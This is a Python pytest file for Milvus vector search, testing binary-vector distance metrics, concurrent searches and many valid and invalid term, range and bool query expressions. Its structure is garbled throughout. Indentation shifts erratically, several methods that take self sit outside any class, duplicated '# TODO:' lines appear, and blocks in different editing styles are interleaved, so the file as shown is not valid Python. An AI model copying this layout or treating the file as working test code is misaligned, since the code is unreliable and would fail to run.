    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_search_distance_jaccard_flat_index(self, connect, binary_collection):
        '''
        target: search binary_collection, and check the result: distance
        method: compare the returned distance value with the value computed with Jaccard distance
        expected: the returned distance equals the computed value
        '''
        nq = 1
        int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
        # generate a query vector that is NOT inserted (insert=False)
        query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
        distance_0 = jaccard(query_int_vectors[0], int_vectors[0])
        distance_1 = jaccard(query_int_vectors[0], int_vectors[1])
        query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="JACCARD")
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, query)
        # smaller Jaccard distance == closer match
        assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_binary_flat_with_L2(self, connect, binary_collection):
        '''
        target: search a binary collection with an incompatible metric
        method: search binary vectors with metric_type L2
        expected: an exception is raised (L2 is invalid for binary vectors)
        '''
        nq = 1
        int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
        query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
        query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="L2")
        with pytest.raises(Exception) as e:
            connect.search(binary_collection, query)
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_distance_hamming_flat_index(self, connect, binary_collection):
        '''
        target: search binary_collection, and check the result: distance
        method: compare the returned distance value with the value computed with Hamming distance
        expected: the returned distance equals the computed value
        '''
        nq = 1
        int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
        query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
        distance_0 = hamming(query_int_vectors[0], int_vectors[0])
        distance_1 = hamming(query_int_vectors[0], int_vectors[1])
        query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="HAMMING")
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, query)
        # .astype(float) implies hamming() returns a numpy scalar -- TODO confirm
        assert abs(res[0][0].distance - min(distance_0, distance_1).astype(float)) <= epsilon
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_distance_substructure_flat_index(self, connect, binary_collection):
        '''
        target: search binary_collection with SUBSTRUCTURE metric
        method: search with new random binary entities and SUBSTRUCTURE metric type
        expected: random queries are substructures of nothing, so the result is empty
        '''
        nq = 1
        int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
        query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
        # NOTE(review): distance_0/distance_1 are computed but never asserted --
        # either assert them or drop the computation
        distance_0 = substructure(query_int_vectors[0], int_vectors[0])
        distance_1 = substructure(query_int_vectors[0], int_vectors[1])
        query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq,
                                        metric_type="SUBSTRUCTURE")
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, query)
        assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_substructure_flat_index_B(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: search with entities that related to inserted entities
expected: the return distance equals to the computed value
'''
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_sub_vectors(int_vectors, 2)
query, vecs = gen_query_vectors(binary_field_name, entities, top_k, nq, metric_type="SUBSTRUCTURE",
replace_vecs=query_vecs)
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert res[0][0].distance <= epsilon
assert res[0][0].id == ids[0]
assert res[1][0].distance <= epsilon
assert res[1][0].id == ids[1]
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_distance_superstructure_flat_index(self, connect, binary_collection):
        '''
        target: search binary_collection with SUPERSTRUCTURE metric
        method: search with new random binary entities and SUPERSTRUCTURE metric type
        expected: random queries are superstructures of nothing, so the result is empty
        '''
        nq = 1
        int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
        query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
        # NOTE(review): distance_0/distance_1 are computed but never asserted --
        # either assert them or drop the computation
        distance_0 = superstructure(query_int_vectors[0], int_vectors[0])
        distance_1 = superstructure(query_int_vectors[0], int_vectors[1])
        query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq,
                                        metric_type="SUPERSTRUCTURE")
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, query)
        assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_superstructure_flat_index_B(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with SUPER
expected: the return distance equals to the computed value
'''
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_super_vectors(int_vectors, 2)
query, vecs = gen_query_vectors(binary_field_name, entities, top_k, nq, metric_type="SUPERSTRUCTURE",
replace_vecs=query_vecs)
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert len(res[0]) == 2
assert len(res[1]) == 2
assert res[0][0].id in ids
assert res[0][0].distance <= epsilon
assert res[1][0].id in ids
assert res[1][0].distance <= epsilon
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_distance_tanimoto_flat_index(self, connect, binary_collection):
        '''
        target: search binary_collection, and check the result: distance
        method: compare the returned distance value with the value computed with Tanimoto distance
        expected: the returned distance equals the computed value
        '''
        nq = 1
        int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
        query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
        distance_0 = tanimoto(query_int_vectors[0], int_vectors[0])
        distance_1 = tanimoto(query_int_vectors[0], int_vectors[1])
        query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="TANIMOTO")
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, query)
        # smaller Tanimoto distance == closer match
        assert abs(res[0][0].distance - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(300)
def test_search_concurrent_multithreads(self, connect, args):
'''
target: test concurrent search with multiprocessess
method: search with 10 processes, each process uses dependent connection
expected: status ok and the returned vectors should be query_records
'''
nb = 100
top_k = 10
threads_num = 4
threads = []
collection = gen_unique_str(uid)
uri = "tcp://%s:%s" % (args["ip"], args["port"])
# create collection
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
milvus.create_collection(collection, default_fields)
entities, ids = init_data(milvus, collection)
connect.load_collection(collection)
def search(milvus):
res = milvus.search(collection, default_query)
assert len(res) == 1
assert res[0]._entities[0].id in ids
assert res[0]._distances[0] < epsilon
for i in range(threads_num):
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
t = MyThread(target=search, args=(milvus,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(300)
def test_search_concurrent_multithreads_single_connection(self, connect, args):
'''
target: test concurrent search with multiprocessess
method: search with 10 processes, each process uses dependent connection
expected: status ok and the returned vectors should be query_records
'''
nb = 100
top_k = 10
threads_num = 4
threads = []
collection = gen_unique_str(uid)
uri = "tcp://%s:%s" % (args["ip"], args["port"])
# create collection
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
milvus.create_collection(collection, default_fields)
entities, ids = init_data(milvus, collection)
connect.load_collection(collection)
def search(milvus):
res = milvus.search(collection, default_query)
assert len(res) == 1
assert res[0]._entities[0].id in ids
assert res[0]._distances[0] < epsilon
for i in range(threads_num):
t = MyThread(target=search, args=(milvus,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L2)
def test_search_multi_collections(self, connect, args):
'''
target: test search multi collections of L2
method: add vectors into 10 collections, and search
expected: search status ok, the length of result
'''
num = 10
top_k = 10
nq = 20
collection_names = []
for i in range(num):
collection = gen_unique_str(uid + str(i))
connect.create_collection(collection, default_fields)
collection_names.append(collection)
entities, ids = init_data(connect, collection)
assert len(ids) == default_nb
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
for i in range(nq):
assert check_id_result(res[i], ids[i])
assert res[i]._distances[0] < epsilon
assert res[i]._distances[1] > epsilon
for i in range(num):
connect.drop_collection(collection_names[i])
    @pytest.mark.skip("r0.3-test")
    def _test_query_entities_with_field_less_than_top_k(self, connect, id_collection):
        """
        target: test search with field, letting the server return fewer entities than topk
        method: insert entities, build an IVF index, and search with field, nprobe=1
        expected: (disabled test; expectation left unstated in the original)
        """
        entities, ids = init_data(connect, id_collection, auto_id=False)
        simple_index = {"index_type": "IVF_FLAT", "params": {"nlist": 200}, "metric_type": "L2"}
        connect.create_index(id_collection, field_name, simple_index)
        # logging.getLogger().info(connect.get_collection_info(id_collection))
        top_k = 300
        # nprobe=1 with nlist=200 probes a single bucket, which may hold < top_k entities
        default_query, default_query_vecs = gen_query_vectors(field_name, entities, top_k, nq,
                                                              search_params={"nprobe": 1})
        expr = {"must": [gen_default_vector_expr(default_query)]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(id_collection)
        res = connect.search(id_collection, query, fields=["int64"])
        assert len(res) == nq
        for r in res[0]:
            assert getattr(r.entity, "int64") == getattr(r.entity, "id")
class TestSearchDSL(object):
"""
******************************************************************
# The following cases are used to build invalid query expr
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_query_no_must(self, connect, collection):
'''
method: build query without must expr
expected: error raised
'''
# entities, ids = init_data(connect, collection)
query = update_query_expr(default_query, keep_old=False)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_query_no_vector_term_only(self, connect, collection):
        '''
        method: build query without vector, with only a term clause
        expected: error raised
        '''
        # entities, ids = init_data(connect, collection)
        # NOTE(review): gen_default_term_expr is passed uncalled (the function
        # object, not its result); harmless here since the query must fail
        # anyway, but presumably gen_default_term_expr() was intended
        expr = {
            "must": [gen_default_term_expr]
        }
        query = update_query_expr(default_query, keep_old=False, expr=expr)
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_query_no_vector_range_only(self, connect, collection):
        '''
        method: build query without vector, with only a range clause
        expected: error raised
        '''
        # entities, ids = init_data(connect, collection)
        # NOTE(review): gen_default_range_expr is passed uncalled (the function
        # object, not its result); harmless since the query must fail anyway
        expr = {
            "must": [gen_default_range_expr]
        }
        query = update_query_expr(default_query, keep_old=False, expr=expr)
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_query_vector_only(self, connect, collection):
        '''
        method: search with the default (vector-only) query
        expected: nq result sets, each of length default_top_k
        '''
        entities, ids = init_data(connect, collection)
        connect.load_collection(collection)
        res = connect.search(collection, default_query)
        assert len(res) == nq
        assert len(res[0]) == default_top_k
    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_query_wrong_format(self, connect, collection):
        '''
        method: build query without must expr, with a misspelled expr key ("must1")
        expected: error raised
        '''
        # entities, ids = init_data(connect, collection)
        expr = {
            "must1": [gen_default_term_expr]
        }
        query = update_query_expr(default_query, keep_old=False, expr=expr)
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_empty(self, connect, collection):
'''
method: search with empty query
expected: error raised
'''
query = {}
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build valid query expr
******************************************************************
"""
    @pytest.mark.tags(CaseLabel.L2)
    def test_query_term_value_not_in(self, connect, collection):
        '''
        method: build query with vector and term expr, where no entity satisfies the term
        expected: filter passes, result set is empty
        '''
        entities, ids = init_data(connect, collection)
        # 100000 is outside the inserted id/value range, so the term matches nothing
        expr = {
            "must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[100000])]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) == 0
# TODO:
    # TODO:
    @pytest.mark.tags(CaseLabel.L2)
    def test_query_term_value_all_in(self, connect, collection):
        '''
        method: build query with vector and term expr, with a single matching term value
        expected: filter passes, exactly one entity survives the filter
        '''
        entities, ids = init_data(connect, collection)
        expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[1])]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) == 1
# TODO:
    # TODO:
    @pytest.mark.tags(CaseLabel.L2)
    def test_query_term_values_not_in(self, connect, collection):
        '''
        method: build query with vector and term expr, where no entity satisfies the terms
        expected: filter passes, result set is empty
        '''
        entities, ids = init_data(connect, collection)
        # all values lie outside the inserted range, so the term matches nothing
        expr = {"must": [gen_default_vector_expr(default_query),
                         gen_default_term_expr(values=[i for i in range(100000, 100010)])]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) == 0
# TODO:
    # TODO:
    @pytest.mark.tags(CaseLabel.L2)
    def test_query_term_values_all_in(self, connect, collection):
        '''
        method: build query with vector and the default term expr (first half of entities)
        expected: filter passes, every returned id belongs to the filtered half
        '''
        entities, ids = init_data(connect, collection)
        expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr()]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) == default_top_k
        # the default term expr covers the first half of the inserted entities
        limit = default_nb // 2
        for i in range(nq):
            for result in res[i]:
                logging.getLogger().info(result.id)
                assert result.id in ids[:limit]
# TODO:
    # TODO:
    @pytest.mark.tags(CaseLabel.L2)
    def test_query_term_values_parts_in(self, connect, collection):
        '''
        method: build query with vector and term expr, where only part of the term
                values exist in the collection
        expected: filter passes, full top_k still returned from the matching part
        '''
        entities, ids = init_data(connect, collection)
        # values span [nb/2, nb + nb/2): the lower half exists, the upper half does not
        expr = {"must": [gen_default_vector_expr(default_query),
                         gen_default_term_expr(
                             values=[i for i in range(default_nb // 2, default_nb + default_nb // 2)])]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) == default_top_k
# TODO:
    # TODO:
    @pytest.mark.tags(CaseLabel.L2)
    def test_query_term_values_repeat(self, connect, collection):
        '''
        method: build query with vector and term expr whose values list repeats one value
        expected: filter passes; duplicates collapse, so exactly one entity matches
        '''
        entities, ids = init_data(connect, collection)
        expr = {
            "must": [gen_default_vector_expr(default_query),
                     gen_default_term_expr(values=[1 for i in range(1, default_nb)])]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) == 1
# TODO:
    # TODO:
    @pytest.mark.tags(CaseLabel.L2)
    def test_query_term_value_empty(self, connect, collection):
        '''
        method: build query whose term values list is empty
        expected: empty result sets (nothing can match an empty term)
        '''
        expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[])]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) == 0
    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_query_complex_dsl(self, connect, collection):
        '''
        method: query with a nested must/should DSL expression
        expected: no error raised (result content is not asserted)
        '''
        # nested structure: (term OR range) AND vector
        expr = {"must": [
            {"must": [{"should": [gen_default_term_expr(values=[1]), gen_default_range_expr()]}]},
            {"must": [gen_default_vector_expr(default_query)]}
        ]}
        logging.getLogger().info(expr)
        query = update_query_expr(default_query, expr=expr)
        logging.getLogger().info(query)
        connect.load_collection(collection)
        res = connect.search(collection, query)
        logging.getLogger().info(res)
"""
******************************************************************
# The following cases are used to build invalid term query expr
******************************************************************
"""
    @pytest.mark.tags(CaseLabel.L2)
    def test_query_term_key_error(self, connect, collection):
        '''
        method: build query whose term keyword is misspelled ("terrm")
        expected: exception raised
        '''
        expr = {"must": [gen_default_vector_expr(default_query),
                         gen_default_term_expr(keyword="terrm", values=[i for i in range(default_nb // 2)])]}
        query = update_query_expr(default_query, expr=expr)
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
    @pytest.fixture(
        scope="function",
        params=gen_invalid_term()
    )
    def get_invalid_term(self, request):
        # parametrized fixture: yields one malformed term expr per test run
        return request.param
    @pytest.mark.tags(CaseLabel.L2)
    def test_query_term_wrong_format(self, connect, collection, get_invalid_term):
        '''
        method: build query with a malformed term expr (from the fixture)
        expected: exception raised
        '''
        entities, ids = init_data(connect, collection)
        term = get_invalid_term
        expr = {"must": [gen_default_vector_expr(default_query), term]}
        query = update_query_expr(default_query, expr=expr)
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
    @pytest.mark.tags(CaseLabel.L2)
    def test_query_term_field_named_term(self, connect, collection):
        '''
        method: create a collection with a field literally named "term" and
                filter on it with a term expr
        expected: search succeeds despite the keyword collision
        '''
        term_fields = add_field_default(default_fields, field_name="term")
        collection_term = gen_unique_str("term")
        connect.create_collection(collection_term, term_fields)
        # NOTE(review): `entities` is not defined in this method -- presumably a
        # module-level default entity set; verify it exists at module scope
        term_entities = add_field(entities, field_name="term")
        ids = connect.insert(collection_term, term_entities)
        assert len(ids) == default_nb
        connect.flush([collection_term])
        # count = connect.count_entities(collection_term)
        # assert count == default_nb
        stats = connect.get_collection_stats(collection_term)
        assert stats["row_count"] == default_nb
        # outer "term" is the expr keyword, inner "term" is the field name
        term_param = {"term": {"term": {"values": [i for i in range(default_nb // 2)]}}}
        expr = {"must": [gen_default_vector_expr(default_query),
                         term_param]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(collection_term)
        res = connect.search(collection_term, query)
        assert len(res) == nq
        assert len(res[0]) == default_top_k
        connect.drop_collection(collection_term)
    @pytest.mark.tags(CaseLabel.L2)
    def test_query_term_one_field_not_existed(self, connect, collection):
        '''
        method: build query with a two-field term expr, one field not existing
        expected: exception raised
        '''
        entities, ids = init_data(connect, collection)
        term = gen_default_term_expr()
        # add a term on field "a", which does not exist in the schema
        term["term"].update({"a": [0]})
        expr = {"must": [gen_default_vector_expr(default_query), term]}
        query = update_query_expr(default_query, expr=expr)
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build valid range query expr
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_range_key_error(self, connect, collection):
'''
method: build query with range key error
expected: Exception raised
'''
range = gen_default_range_expr(keyword="ranges")
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
    @pytest.fixture(
        scope="function",
        params=gen_invalid_range()
    )
    def get_invalid_range(self, request):
        # parametrized fixture: yields one malformed range expr per test run
        return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_query_range_wrong_format(self, connect, collection, get_invalid_range):
'''
method: build query with wrong format range
expected: Exception raised
'''
entities, ids = init_data(connect, collection)
range = get_invalid_range
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.L2)
def test_query_range_string_ranges(self, connect, collection):
'''
method: build query with invalid ranges
expected: raise Exception
'''
entities, ids = init_data(connect, collection)
ranges = {"GT": "0", "LT": "1000"}
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.L2)
def test_query_range_invalid_ranges(self, connect, collection):
'''
method: build query with invalid ranges
expected: 0
'''
entities, ids = init_data(connect, collection)
ranges = {"GT": default_nb, "LT": 0}
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res[0]) == 0
    @pytest.fixture(
        scope="function",
        params=gen_valid_ranges()
    )
    def get_valid_ranges(self, request):
        # parametrized fixture: yields one well-formed ranges dict per test run
        return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_query_range_valid_ranges(self, connect, collection, get_valid_ranges):
'''
method: build query with valid ranges
expected: pass
'''
entities, ids = init_data(connect, collection)
ranges = get_valid_ranges
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_range_one_field_not_existed(self, connect, collection):
'''
method: build query with two fields ranges, one of fields not existed
expected: exception raised
'''
entities, ids = init_data(connect, collection)
range = gen_default_range_expr()
range["range"].update({"a": {"GT": 1, "LT": default_nb // 2}})
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
************************************************************************
# The following cases are used to build query expr multi range and term
************************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_query_multi_term_has_common(self, connect, collection):
    """
    method: two term expressions on the same field with overlapping values
    expected: full top-k returned
    """
    init_data(connect, collection)
    overlapping_term = gen_default_term_expr(values=list(range(default_nb // 3)))
    query = update_query_expr(
        default_query,
        expr={"must": [gen_default_vector_expr(default_query),
                       gen_default_term_expr(), overlapping_term]})
    connect.load_collection(collection)
    results = connect.search(collection, query)
    assert len(results) == nq
    assert len(results[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L2)
def test_query_multi_term_no_common(self, connect, collection):
    """
    method: two term expressions on the same field with disjoint value sets
    expected: search succeeds with 0 hits
    """
    init_data(connect, collection)
    disjoint_term = gen_default_term_expr(
        values=list(range(default_nb // 2, default_nb + default_nb // 2)))
    query = update_query_expr(
        default_query,
        expr={"must": [gen_default_vector_expr(default_query),
                       gen_default_term_expr(), disjoint_term]})
    connect.load_collection(collection)
    results = connect.search(collection, query)
    assert len(results) == nq
    assert len(results[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_query_multi_term_different_fields(self, connect, collection):
    """
    method: two term expressions on different fields whose matching entity
            sets do not intersect
    expected: search succeeds with 0 hits
    """
    init_data(connect, collection)
    float_term = gen_default_term_expr(
        field="float",
        values=[float(v) for v in range(default_nb // 2, default_nb)])
    query = update_query_expr(
        default_query,
        expr={"must": [gen_default_vector_expr(default_query),
                       gen_default_term_expr(), float_term]})
    connect.load_collection(collection)
    results = connect.search(collection, query)
    assert len(results) == nq
    assert len(results[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_query_single_term_multi_fields(self, connect, collection):
    """
    method: one term expression carrying two different fields at once
    expected: exception raised
    """
    init_data(connect, collection)
    int_part = {"int64": {"values": list(range(default_nb // 2))}}
    float_part = {"float": {"values": [float(v) for v in range(default_nb // 2, default_nb)]}}
    term = update_term_expr({"term": {}}, [int_part, float_part])
    query = update_query_expr(
        default_query,
        expr={"must": [gen_default_vector_expr(default_query), term]})
    with pytest.raises(Exception) as e:
        connect.search(collection, query)
@pytest.mark.tags(CaseLabel.L2)
def test_query_multi_range_has_common(self, connect, collection):
    """
    method: two range expressions on the same field with overlapping bounds
    expected: full top-k returned
    """
    init_data(connect, collection)
    overlapping_range = gen_default_range_expr(ranges={"GT": 1, "LT": default_nb // 3})
    query = update_query_expr(
        default_query,
        expr={"must": [gen_default_vector_expr(default_query),
                       gen_default_range_expr(), overlapping_range]})
    connect.load_collection(collection)
    results = connect.search(collection, query)
    assert len(results) == nq
    assert len(results[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L2)
def test_query_multi_range_no_common(self, connect, collection):
    """
    method: two range expressions on the same field with disjoint bounds
    expected: search succeeds with 0 hits
    """
    init_data(connect, collection)
    disjoint_range = gen_default_range_expr(
        ranges={"GT": default_nb // 2, "LT": default_nb})
    query = update_query_expr(
        default_query,
        expr={"must": [gen_default_vector_expr(default_query),
                       gen_default_range_expr(), disjoint_range]})
    connect.load_collection(collection)
    results = connect.search(collection, query)
    assert len(results) == nq
    assert len(results[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_query_multi_range_different_fields(self, connect, collection):
    """
    method: two range expressions on different fields whose matching entity
            sets do not intersect
    expected: search succeeds with 0 hits
    """
    init_data(connect, collection)
    float_range = gen_default_range_expr(
        field="float", ranges={"GT": default_nb // 2, "LT": default_nb})
    query = update_query_expr(
        default_query,
        expr={"must": [gen_default_vector_expr(default_query),
                       gen_default_range_expr(), float_range]})
    connect.load_collection(collection)
    results = connect.search(collection, query)
    assert len(results) == nq
    assert len(results[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_query_single_range_multi_fields(self, connect, collection):
    """
    method: one range expression carrying two different fields at once
    expected: exception raised
    """
    init_data(connect, collection)
    int_part = {"int64": {"GT": 0, "LT": default_nb // 2}}
    float_part = {"float": {"GT": default_nb / 2, "LT": float(default_nb)}}
    range_expr = update_range_expr({"range": {}}, [int_part, float_part])
    query = update_query_expr(
        default_query,
        expr={"must": [gen_default_vector_expr(default_query), range_expr]})
    with pytest.raises(Exception) as e:
        connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build query expr both term and range
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_query_single_term_range_has_common(self, connect, collection):
    """
    method: one term plus one range on the same field, overlapping
    expected: full top-k returned
    """
    init_data(connect, collection)
    range_expr = gen_default_range_expr(ranges={"GT": -1, "LT": default_nb // 2})
    query = update_query_expr(
        default_query,
        expr={"must": [gen_default_vector_expr(default_query),
                       gen_default_term_expr(), range_expr]})
    connect.load_collection(collection)
    results = connect.search(collection, query)
    assert len(results) == nq
    assert len(results[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L2)
def test_query_single_term_range_no_common(self, connect, collection):
    """
    method: one term plus one range on the same field, disjoint
    expected: search succeeds with 0 hits
    """
    init_data(connect, collection)
    range_expr = gen_default_range_expr(ranges={"GT": default_nb // 2, "LT": default_nb})
    query = update_query_expr(
        default_query,
        expr={"must": [gen_default_vector_expr(default_query),
                       gen_default_term_expr(), range_expr]})
    connect.load_collection(collection)
    results = connect.search(collection, query)
    assert len(results) == nq
    assert len(results[0]) == 0
"""
******************************************************************
# The following cases are used to build multi vectors query expr
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_query_multi_vectors_same_field(self, connect, collection):
    """
    method: put two vector sub-queries on the same field into one bool.must
    expected: exception raised
    """
    entities, _ = init_data(connect, collection)
    second_vector_query = gen_query_vectors(field_name, entities, default_top_k, nq=2)
    query = update_query_expr(
        default_query,
        expr={"must": [default_query, second_vector_query]})
    with pytest.raises(Exception) as e:
        connect.search(collection, query)
class TestSearchDSLBools(object):
    """
    ******************************************************************
    # The following cases are used to build invalid query expr
    ******************************************************************
    """

    @pytest.mark.tags(CaseLabel.L2)
    def test_query_no_bool(self, connect, collection):
        '''
        method: build query without bool expr
        expected: error raised
        '''
        entities, ids = init_data(connect, collection)
        # "bool1" is not a recognized top-level key, so search must reject it.
        query = {"bool1": {}}
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_query_should_only_term(self, connect, collection):
        '''
        method: build query without must, with should.term instead
        expected: error raised
        '''
        # FIX: call gen_default_term_expr() -- the original passed the
        # function object itself, so the query never contained an actual
        # term expression and the test exercised the wrong failure mode.
        expr = {"should": gen_default_term_expr()}
        query = update_query_expr(default_query, keep_old=False, expr=expr)
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_query_should_only_vector(self, connect, collection):
        '''
        method: build query without must, with should.vector instead
        expected: error raised
        '''
        expr = {"should": default_query["bool"]["must"]}
        query = update_query_expr(default_query, keep_old=False, expr=expr)
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)

    @pytest.mark.tags(CaseLabel.L2)
    def test_query_must_not_only_term(self, connect, collection):
        '''
        method: build query without must, with must_not.term instead
        expected: error raised
        '''
        # FIX: call gen_default_term_expr() (was the bare function object).
        expr = {"must_not": gen_default_term_expr()}
        query = update_query_expr(default_query, keep_old=False, expr=expr)
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)

    @pytest.mark.tags(CaseLabel.L2)
    def test_query_must_not_vector(self, connect, collection):
        '''
        method: build query without must, with must_not.vector instead
        expected: error raised
        '''
        expr = {"must_not": default_query["bool"]["must"]}
        query = update_query_expr(default_query, keep_old=False, expr=expr)
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)

    @pytest.mark.tags(CaseLabel.L2)
    def test_query_must_should(self, connect, collection):
        '''
        method: build query with must, and with should.term as well
        expected: error raised
        '''
        # FIX: call gen_default_term_expr() (was the bare function object).
        expr = {"should": gen_default_term_expr()}
        query = update_query_expr(default_query, keep_old=True, expr=expr)
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to test `search` function
# with invalid collection_name, or invalid query expr
******************************************************************
"""
